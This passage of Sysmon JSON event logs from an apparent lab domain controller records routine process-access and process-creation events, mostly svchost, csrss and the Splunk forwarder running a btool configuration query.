{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.527\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00105D120500}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.527","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00105D120500}","TargetProcessId":"5080","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.783\r\nProcessGuid: {A837DB8D-0238-5F25-0000-001018150500}\r\nProcessId: 5100\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.783","ProcessGuid":"{A837DB8D-0238-5F25-0000-001018150500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001018150500}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+13ac4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001018150500}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+13ac4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001018150500}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001018150500}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.D